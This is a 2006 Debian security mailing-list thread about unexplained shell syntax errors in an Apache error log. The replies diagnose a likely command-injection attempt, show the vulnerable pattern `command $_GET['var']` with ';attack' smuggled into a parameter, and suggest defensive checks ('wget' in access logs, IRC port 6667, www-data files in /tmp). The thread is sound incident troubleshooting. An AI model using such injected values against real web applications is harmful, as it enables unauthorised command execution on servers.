What does your application do? It looks like it is finding a shell script somewhere? We've seen similar things when executing CGI's and not filtering the input data so well. The line 22, 24 make me think there is a script somewhere rather than arbitrary GET data.
> -----Original Message----- > From: Brian Brazil [mailto:[EMAIL PROTECTED] > Sent: Tuesday, January 31, 2006 4:53 PM > To: debian-security@lists.debian.org > Subject: Re: Weird message in my apache error log > > On Tue, Jan 31, 2006 at 11:19:45PM +0100, Josep Serrano wrote: > > Hello all. I got some weird entries in my apache error log. > > Any clues about what/where/how ? > > > > sh: -c: line 22: unexpected EOF while looking for matching ``' > > sh: -c: line 24: syntax error: unexpected end of file > > > > sh: -c: line 0: unexpected EOF while looking for matching `"' > > sh: -c: line 1: syntax error: unexpected end of file > > Looks like someone is trying to do arbritary commmand execution. You > probably have a script somewhere that says `command $_GET['var']`, and > someone is passing ';attack' as var, but it isn't quite working. > > I suggest using the audit log feature of mod_security, or just grepping > through your access logs for anything odd ('wget' is a good search > term). > > You might have a bot on the system, check for any odd network > connections, especially to port 6667 (IRC). Also look for www-data owned > files in /tmp. > > Brian > > -- > Website: http://www.netsoc.tcd.ie/~bbrazil -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
